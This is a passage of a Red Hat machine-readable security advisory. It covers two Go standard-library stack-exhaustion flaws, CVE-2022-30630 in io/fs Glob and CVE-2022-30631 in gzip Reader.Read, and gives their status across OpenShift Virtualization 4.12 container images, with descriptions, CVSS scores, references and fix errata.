"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107371", }, ], notes: [ { category: "description", text: "A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: io/fs: stack exhaustion in Glob", title: "Vulnerability summary", }, { category: "other", text: "RH ProdSec has set the Impact of this vulnerability to Moderate as there is no known method to execute arbitary code. Successful exploitation of this bug can cause the application under attack to panic, merely causing a Denial of Service at the application level. As the kernel is unaffected by this bug, the user can merely relaunch the application to fix the problem. Also, if somehow the application keeps relaunching, the timer watchdogs in the default RHEL kernel will stop the attack in its tracks.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30630", }, { category: "external", summary: "RHBZ#2107371", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30630", url: "https://www.cve.org/CVERecord?id=CVE-2022-30630", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30630", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30630", }, { category: "external", summary: "https://go.dev/issue/53415", url: "https://go.dev/issue/53415", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: io/fs: stack exhaustion in Glob", }, { cve: "CVE-2022-30631", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107342", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling the Reader, Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "golang: compress/gzip: stack exhaustion in Reader.Read", title: "Vulnerability summary", }, { category: "other", text: "To exploit CVE-2022-30631, an attacker supplies a specially crafted gzip archive to a Go application that uses a vulnerable version of the compress/gzip package without adequate input validation. This can lead to uncontrolled recursion, resulting in stack exhaustion and causing the application to panic, thereby affecting its availability.\n\nAs this is merely a DoS and there is no known way to control the instruction pointer, RH ProdSec has set the impact of this vulnerabilty to \"Moderate\".\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", 